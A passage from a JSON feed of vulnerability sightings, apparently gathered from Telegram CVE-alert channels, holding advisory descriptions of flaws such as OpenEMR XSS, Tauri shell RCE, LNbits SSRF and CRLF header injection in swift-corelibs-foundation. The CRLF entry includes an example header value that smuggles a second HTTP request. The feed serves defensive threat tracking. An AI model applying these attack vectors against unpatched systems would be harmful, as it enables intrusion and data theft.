successful attack may lead to an access token being stolen, making it possible for the attacker to impersonate other users.\n\ud83d\udccf Published: 2024-01-26T14:23:43.185Z\n\ud83d\udccf Modified: 2025-04-03T02:35:28.214Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2023:7854\n2. https://access.redhat.com/errata/RHSA-2023:7855\n3. https://access.redhat.com/errata/RHSA-2023:7856\n4. https://access.redhat.com/errata/RHSA-2023:7857\n5. https://access.redhat.com/errata/RHSA-2023:7858\n6. https://access.redhat.com/errata/RHSA-2023:7860\n7. https://access.redhat.com/errata/RHSA-2023:7861\n8. https://access.redhat.com/errata/RHSA-2024:0798\n9. https://access.redhat.com/errata/RHSA-2024:0799\n10. https://access.redhat.com/errata/RHSA-2024:0800\n11. https://access.redhat.com/errata/RHSA-2024:0801\n12. https://access.redhat.com/errata/RHSA-2024:0804\n13. https://access.redhat.com/security/cve/CVE-2023-6291\n14. https://bugzilla.redhat.com/show_bug.cgi?id=2251407", "creation_timestamp": "2025-04-03T03:33:49.000000Z"}, {"uuid": "51e7fcaa-33f9-4a82-8a2b-486a90247696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WVPQ-H33F-8RP6", "type": "published-proof-of-concept", "source": "Telegram/UDMk206lgQvLt4zm60yBzpmxh6GeqSRvdRaLpn90JAOiIEo", "content": "", "creation_timestamp": "2026-01-10T05:02:58.000000Z"}, {"uuid": "2ae1f0de-4749-4fe2-9dfe-0079141075ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCWC-3FW3-8CQV", "type": "seen", "source": "Telegram/Oq5Ood_4NS_q2MjX-UETlnapDxCUgYA-dHZPJ_gTTRAs320", "content": "", "creation_timestamp": "2026-01-10T05:03:11.000000Z"}, {"uuid": "26af4ca7-c7e6-413a-8758-076d65ea6b7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2W94-QMJ6-3QXX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9942", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31121\n\ud83d\udd25 CVSS Score: 7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 7.0.3.1, the Patient Image feature in OpenEMR is vulnerable to cross-site scripting attacks via the EXIF title in an image. This vulnerability is fixed in 7.0.3.1.\n\ud83d\udccf Published: 2025-04-01T14:53:03.469Z\n\ud83d\udccf Modified: 2025-04-01T16:13:34.453Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-2w94-qmj6-3qxx", "creation_timestamp": "2025-04-01T16:32:24.000000Z"}, {"uuid": "0a5ac8b3-a26a-4ac0-8faf-9f8f31bb45aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2213", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9940", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6917\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability has been identified in the Performance Co-Pilot (PCP) package, stemming from the mixed privilege levels utilized by systemd services associated with PCP. While certain services operate within the confines of limited PCP user/group privileges, others are granted full root privileges. This disparity in privilege levels poses a risk when privileged root processes interact with directories or directory trees owned by unprivileged PCP users. Specifically, this vulnerability may lead to the compromise of PCP user isolation and facilitate local PCP-to-root exploits, particularly through symlink attacks. These vulnerabilities underscore the importance of maintaining robust privilege separation mechanisms within PCP to mitigate the potential for unauthorized privilege escalation.\n\ud83d\udccf Published: 2024-02-28T14:38:19.258Z\n\ud83d\udccf Modified: 2025-04-01T16:16:17.391Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2213\n2. https://access.redhat.com/security/cve/CVE-2023-6917\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2254983", "creation_timestamp": "2025-04-01T16:32:22.000000Z"}, {"uuid": "e3ae66a5-900e-4a3c-99b4-dc0d765dbb85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4Q56-CRQP-V477", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9963", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31137\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: React Router is a multi-strategy router for React bridging the gap from React 18 to React 19. There is a vulnerability in Remix/React Router that affects all Remix 2 and React Router 7 consumers using the Express adapter. Basically, this vulnerability allows anyone to spoof the URL used in an incoming Request by putting a URL pathname in the port section of a URL that is part of a Host or X-Forwarded-Host header sent to a Remix/React Router request handler. This issue has been patched and released in Remix 2.16.3 and React Router 7.4.1.\n\ud83d\udccf Published: 2025-04-01T18:20:32.660Z\n\ud83d\udccf Modified: 2025-04-01T18:20:32.660Z\n\ud83d\udd17 References:\n1. https://github.com/remix-run/react-router/security/advisories/GHSA-4q56-crqp-v477", "creation_timestamp": "2025-04-01T18:32:39.000000Z"}, {"uuid": "a54c2bff-40b4-411b-a326-1d83b13147d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GHG-3787-W2XR", "type": "seen", "source": "Telegram/Oq5Ood_4NS_q2MjX-UETlnapDxCUgYA-dHZPJ_gTTRAs320", "content": "", "creation_timestamp": "2026-01-10T05:03:11.000000Z"}, {"uuid": "f9c5904b-e695-4106-af92-72724be2831d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VXW4-WV6M-9HHH", "type": "published-proof-of-concept", "source": "Telegram/4zuUlGU6EvpMTWPbip1_D3Ts-W_MioI6unE3WF1UcmysLKI", "content": "", "creation_timestamp": "2026-01-13T00:02:07.000000Z"}, {"uuid": "c1e88039-37ea-4f13-99ad-64af6e39a4c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78H3-63C4-5FQC", "type": "seen", "source": "Telegram/Oq5Ood_4NS_q2MjX-UETlnapDxCUgYA-dHZPJ_gTTRAs320", "content": "", "creation_timestamp": "2026-01-10T05:03:11.000000Z"}, {"uuid": "37df0ec1-5ee0-4d92-aeb9-c00146412b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J9XQ-69PF-PCM8", "type": "seen", "source": "Telegram/QuRUgWCRdNzWcYTios3SXh8Vy406o-CwKkI1neN56hwn-As", "content": "", "creation_timestamp": "2026-01-10T07:01:56.000000Z"}, {"uuid": "15fbe169-3a27-4bdb-8e73-24f427147950", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2C3-PQW5-5P7C", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10023", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31135\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Go-Guerrilla SMTP Daemon is a lightweight SMTP server written in Go. Prior to 1.6.7, when ProxyOn is enabled, the PROXY command will be accepted multiple times, with later invocations overriding earlier ones. The proxy protocol only supports one initial PROXY header; anything after that is considered part of the exchange between client and server, so the client is free to send further PROXY commands with whatever data it pleases. go-guerrilla will treat these as coming from the reverse proxy, allowing a client to spoof its IP address. This vulnerability is fixed in 1.6.7.\n\ud83d\udccf Published: 2025-04-01T22:03:09.405Z\n\ud83d\udccf Modified: 2025-04-01T22:03:09.405Z\n\ud83d\udd17 References:\n1. https://github.com/phires/go-guerrilla/security/advisories/GHSA-c2c3-pqw5-5p7c\n2. https://github.com/phires/go-guerrilla/commit/7673947f2d5204a135d7ae0b7f80759e548abee6", "creation_timestamp": "2025-04-01T22:32:44.000000Z"}, {"uuid": "195dd79c-c2a3-4fce-af82-f454bcc0b763", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4PP3-MPF2-RJ63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10132", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-3918\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: A program using FoundationNetworking in swift-corelibs-foundation is potentially vulnerable to CRLF ( ) injection in URLRequest headers. In this vulnerability, a client can insert one or several CRLF sequences into a URLRequest header value. When that request is sent via URLSession to an HTTP server, the server may interpret the content after the CRLF as extra headers, or even a second request. For example, consider a URLRequest to http://example.com/ with the GET method. Suppose we set the URLRequest header \"Foo\" to the value \"Bar Extra-Header: Added GET /other HTTP/1.1\". When this request is sent, it will appear to the server as two requests: GET / HTTP/1.1 Foo: Bar Extra-Header: Added GET /other HTTP/1.1 In this manner, the client is able to inject extra headers and craft an entirely new request to a separate path, despite only making one API call in URLSession. If a developer has total control over the request and its headers, this vulnerability may not pose a threat. However, this vulnerability escalates if un-sanitized user input is placed in header values. If so, a malicious user could inject new headers or requests to an intermediary or backend server. Developers should be especially careful to sanitize user input in this case, or upgrade their version of swift-corelibs-foundation to include the patch below.\n\ud83d\udccf Published: 2023-01-20T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-02T16:07:17.733Z\n\ud83d\udd17 References:\n1. https://github.com/apple/swift-corelibs-foundation/security/advisories/GHSA-4pp3-mpf2-rj63", "creation_timestamp": "2025-04-02T16:35:15.000000Z"}, {"uuid": "a1aff290-fcbc-44fd-b6cd-ee0754bfeea0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26WH-CC3R-W6PJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10144", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31479\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: canonical/get-workflow-version-action is a GitHub composite action to get commit SHA that GitHub Actions reusable workflow was called with. Prior to 1.0.1, if the get-workflow-version-action step fails, the exception output may include the GITHUB_TOKEN. If the full token is included in the exception output, GitHub will automatically redact the secret from the GitHub Actions logs. However, the token may be truncated\u2014causing part of the GITHUB_TOKEN to be displayed in plaintext in the GitHub Actions logs. Anyone with read access to the GitHub repository can view GitHub Actions logs. For public repositories, anyone can view the GitHub Actions logs. The opportunity to exploit this vulnerability is limited\u2014the GITHUB_TOKEN is automatically revoked when the job completes. However, there is an opportunity for an attack in the time between the GITHUB_TOKEN being displayed in the logs and the completion of the job. Users using the github-token input are impacted. This vulnerability is fixed in 1.0.1.\n\ud83d\udccf Published: 2025-04-02T21:09:34.354Z\n\ud83d\udccf Modified: 2025-04-02T21:09:34.354Z\n\ud83d\udd17 References:\n1. https://github.com/canonical/get-workflow-version-action/security/advisories/GHSA-26wh-cc3r-w6pj\n2. https://github.com/canonical/get-workflow-version-action/issues/2\n3. https://github.com/canonical/get-workflow-version-action/commit/88281a62e96e1c0ef4df30352ae0668a9f3e3369", "creation_timestamp": "2025-04-02T21:34:13.000000Z"}, {"uuid": "1ae902d1-0c29-4ff3-b236-09ba795d2381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3G8-FP6J-WVQW", "type": "seen", "source": "Telegram/i2g9ck4oFpG2FQ6NO-wq7UgJ3FLiFKBZXo4--EYsPHmrFO0", "content": "", "creation_timestamp": "2026-01-10T07:01:39.000000Z"}, {"uuid": "987e07a5-1580-475e-820f-515f532b9e4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC2H-H868-Q7HJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10280", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0397\n\ud83d\udd25 CVSS Score: 9.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H)\n\ud83d\udd39 Description: A malicious / defect bluetooth controller can cause a Denial of Service due to unchecked input in le_read_buffer_size_complete.\n\ud83d\udccf Published: 2023-01-19T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-03T17:03:20.150Z\n\ud83d\udd17 References:\n1. https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-wc2h-h868-q7hj", "creation_timestamp": "2025-04-03T17:35:36.000000Z"}, {"uuid": "c5c9ff0d-dd21-46af-91a7-3cde107dc863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1334", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11193", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T15:27:46.732Z\n\ud83d\udccf Modified: 2025-04-10T03:57:34.220Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:1334\n2. https://access.redhat.com/errata/RHSA-2025:1468\n3. https://access.redhat.com/security/cve/CVE-2024-11831\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n5. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n6. https://github.com/yahoo/serialize-javascript/pull/173", "creation_timestamp": "2025-04-10T04:49:05.000000Z"}, {"uuid": "7f5f35a0-2fa1-47ef-90e0-14df83b8faaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GRG2-63FW-F2QR", "type": "published-proof-of-concept", "source": "Telegram/WQqRawnFxdQj2C7QSZvJhJYu2ip6AHddUppaVRsAsIpfVRo", "content": "", "creation_timestamp": "2026-01-10T08:01:06.000000Z"}, {"uuid": "9d3b1c10-1102-4d28-aeac-ea2438a5990e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9PR-Q8GX-3MGP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10143", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31477\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: The Tauri shell plugin allows access to the system shell. Prior to 2.2.1, the Tauri shell plugin exposes functionality to execute code and open programs on the system. The open endpoint of this plugin is designed to allow open functionality with the system opener (e.g. xdg-open on Linux). This was meant to be restricted to a reasonable number of protocols like https or mailto by default. This default restriction was not functional due to improper validation of the allowed protocols, allowing for potentially dangerous protocols like file://, smb://, or nfs:// and others to be opened by the system registered protocol handler. By passing untrusted user input to the open endpoint these potentially dangerous protocols can be abused to gain remote code execution on the system. This either requires direct exposure of the endpoint to application users or code execution in the frontend of a Tauri application. This vulnerability is fixed in 2.2.1.\n\ud83d\udccf Published: 2025-04-02T21:10:14.264Z\n\ud83d\udccf Modified: 2025-04-02T21:10:14.264Z\n\ud83d\udd17 References:\n1. https://github.com/tauri-apps/plugins-workspace/security/advisories/GHSA-c9pr-q8gx-3mgp\n2. https://github.com/tauri-apps/plugins-workspace/commit/9cf0390a52497e273db1a1b613a0e26827aa327c", "creation_timestamp": "2025-04-02T21:34:12.000000Z"}, {"uuid": "c7f39309-3185-4825-9c0f-6ef73392b23e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QP8J-P87F-C8CC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10641", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32013\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: LNbits is a Lightning wallet and accounts system. A Server-Side Request Forgery (SSRF) vulnerability has been discovered in LNbits' LNURL authentication handling functionality. When processing LNURL authentication requests, the application accepts a callback URL parameter and makes an HTTP request to that URL using the httpx library with redirect following enabled. The application doesn't properly validate the callback URL, allowing attackers to specify internal network addresses and access internal resources.\n\ud83d\udccf Published: 2025-04-06T20:07:05.624Z\n\ud83d\udccf Modified: 2025-04-06T20:07:05.624Z\n\ud83d\udd17 References:\n1. https://github.com/lnbits/lnbits/security/advisories/GHSA-qp8j-p87f-c8cc", "creation_timestamp": "2025-04-06T20:43:59.000000Z"}, {"uuid": "8278cb23-5695-403b-88dd-1759c4cc6739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7HVW-Q8Q5-GPMJ", "type": "published-proof-of-concept", "source": "Telegram/TtjXsNK2JI7-6q-2dTs3Ev3VxXtuEcF5K_zir_JYhY6EW9Y", "content": "", "creation_timestamp": "2026-01-08T02:00:39.000000Z"}, {"uuid": "91a573a5-06f8-4114-bccb-f7f7f91ee167", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GHJW-32XW-FFWR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10568", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-47827\n\ud83d\udd25 CVSS Score: 5.7 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Due to a race condition in a global variable in 3.6.0-rc1, the argo workflows controller can be made to crash on-command by any user with access to execute a workflow. This vulnerability is fixed in 3.6.0-rc2.\n\ud83d\udccf Published: 2024-10-28T15:10:55.772Z\n\ud83d\udccf Modified: 2025-04-04T20:43:57.325Z\n\ud83d\udd17 References:\n1. https://github.com/argoproj/argo-workflows/security/advisories/GHSA-ghjw-32xw-ffwr\n2. https://github.com/argoproj/argo-workflows/pull/13641\n3. https://github.com/argoproj/argo-workflows/commit/524406451f4dfa57bf3371fb85becdb56a2b309a\n4. https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L75", "creation_timestamp": "2025-04-04T21:36:22.000000Z"}, {"uuid": "f77399d1-4e04-433b-96d2-389322b134fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-75M2-JHH5-J5G2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10906", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32034\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. Prior to 1.61.2 and 2.1.1, a vulnerability in Apollo Router allowed queries with deeply nested and reused named fragments to be prohibitively expensive to query plan, specifically during named fragment expansion. Named fragments were being expanded once per fragment spread during query planning, leading to exponential resource usage when deeply nested and reused fragments were involved. This could lead to excessive resource consumption and denial of service. This has been remediated in apollo-router versions 1.61.2 and 2.1.1.\n\ud83d\udccf Published: 2025-04-07T20:50:29.690Z\n\ud83d\udccf Modified: 2025-04-08T13:30:44.951Z\n\ud83d\udd17 References:\n1. https://github.com/apollographql/router/security/advisories/GHSA-75m2-jhh5-j5g2\n2. https://github.com/apollographql/router/commit/ab6675a63174715ea6ff50881fc957831d4e9564\n3. https://github.com/apollographql/router/commit/bba032e183b861348a466d3123c7137a1ae18952", "creation_timestamp": "2025-04-08T13:46:38.000000Z"}, {"uuid": "cf4bb4c2-e45a-4f8d-9852-10f62d4b7b31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1908", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10194", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8676\n\ud83d\udd25 CVSS Score: 7.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: A vulnerability was found in CRI-O, where it can be requested to take a checkpoint archive of a container and later be asked to restore it. When it does that restoration, it attempts to restore the mounts from the restore archive instead of the pod request. As a result, the validations run on the pod spec, verifying that the pod has access to the mounts it specifies are not applicable to a restored container. This flaw allows a malicious user to trick CRI-O into restoring a pod that doesn't have access to host mounts. The user needs access to the kubelet or cri-o socket to call the restore endpoint and trigger the restore.\n\ud83d\udccf Published: 2024-11-26T19:15:48.475Z\n\ud83d\udccf Modified: 2025-04-03T10:28:35.970Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHBA-2024:10826\n2. https://access.redhat.com/errata/RHSA-2025:0648\n3. https://access.redhat.com/errata/RHSA-2025:1908\n4. https://access.redhat.com/errata/RHSA-2025:3297\n5. https://access.redhat.com/security/cve/CVE-2024-8676\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2313842", "creation_timestamp": "2025-04-03T10:35:13.000000Z"}, {"uuid": "350c5de8-1c06-4016-bd8e-e716e7410faf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88M4-H43F-WX84", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10563", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23215\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/U:Clear)\n\ud83d\udd39 Description: PMD is an extensible multilanguage static code analyzer. The passphrase for the PMD and PMD Designer release signing keys are included in jar published to Maven Central. The private key itself is not known to have been compromised itself, but given its passphrase is, it must also be considered potentially compromised. As a mitigation, both compromised keys have been revoked so that no future use of the keys are possible. Note, that the published artifacts in Maven Central under the group id net.sourceforge.pmd are not compromised and the signatures are valid.\n\ud83d\udccf Published: 2025-01-31T15:25:53.026Z\n\ud83d\udccf Modified: 2025-04-04T21:08:48.961Z\n\ud83d\udd17 References:\n1. https://github.com/pmd/pmd/security/advisories/GHSA-88m4-h43f-wx84\n2. https://github.com/pmd/pmd-designer/commit/1548f5f27ba2981b890827fecbd0612fa70a0362\n3. https://github.com/pmd/pmd-designer/commit/e87a45312753ec46b3e5576c6f6ac1f7de2f5891", "creation_timestamp": "2025-04-04T21:36:15.000000Z"}, {"uuid": "f779c522-ffc7-4a19-b2e8-2e7800be318b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/32754", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/ProDefense/CVE-2025-32433\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-18T18:32:28.000000Z"}, {"uuid": "f4d9b017-eb6b-4b71-81ff-2f689dae59f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33XH-JQGF-6627", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10472", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31480\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: aiven-extras is a PostgreSQL extension. This is a privilege escalation vulnerability, allowing elevation to superuser inside PostgreSQL databases that use the aiven-extras package. The vulnerability leverages the format function not being schema-prefixed. Affected users should install 1.1.16 and ensure they run the latest version issuing ALTER EXTENSION aiven_extras UPDATE TO '1.1.16' after installing it. This needs to happen in each database aiven_extras has been installed in.\n\ud83d\udccf Published: 2025-04-04T14:49:30.863Z\n\ud83d\udccf Modified: 2025-04-04T14:57:54.321Z\n\ud83d\udd17 References:\n1. https://github.com/aiven/aiven-extras/security/advisories/GHSA-33xh-jqgf-6627\n2. https://github.com/aiven/aiven-extras/commit/77b5f19a0c1d196bc741ff5c774f85fe7ca3063b", "creation_timestamp": "2025-04-04T15:36:55.000000Z"}, {"uuid": "3299b81d-28a9-432e-918a-e4a561ff36de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2F9-X4P4-7XMH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/10782", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32030\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Apollo Gateway provides utilities for combining multiple GraphQL microservices into a single GraphQL endpoint. Prior to 2.10.1, a vulnerability in Apollo Gateway allowed queries with deeply nested and reused named fragments to be prohibitively expensive to query plan, specifically during named fragment expansion. Named fragments were being expanded once per fragment spread during query planning, leading to exponential resource usage when deeply nested and reused fragments were involved. This could lead to excessive resource consumption and denial of service. This has been remediated in @apollo/gateway version 2.10.1.\n\ud83d\udccf Published: 2025-04-07T20:38:59.654Z\n\ud83d\udccf Modified: 2025-04-07T20:38:59.654Z\n\ud83d\udd17 References:\n1. https://github.com/apollographql/federation/security/advisories/GHSA-q2f9-x4p4-7xmh\n2. https://github.com/apollographql/federation/pull/3236\n3. https://github.com/apollographql/federation/releases/tag/%40apollo%2Fgateway%402.10.1", "creation_timestamp": 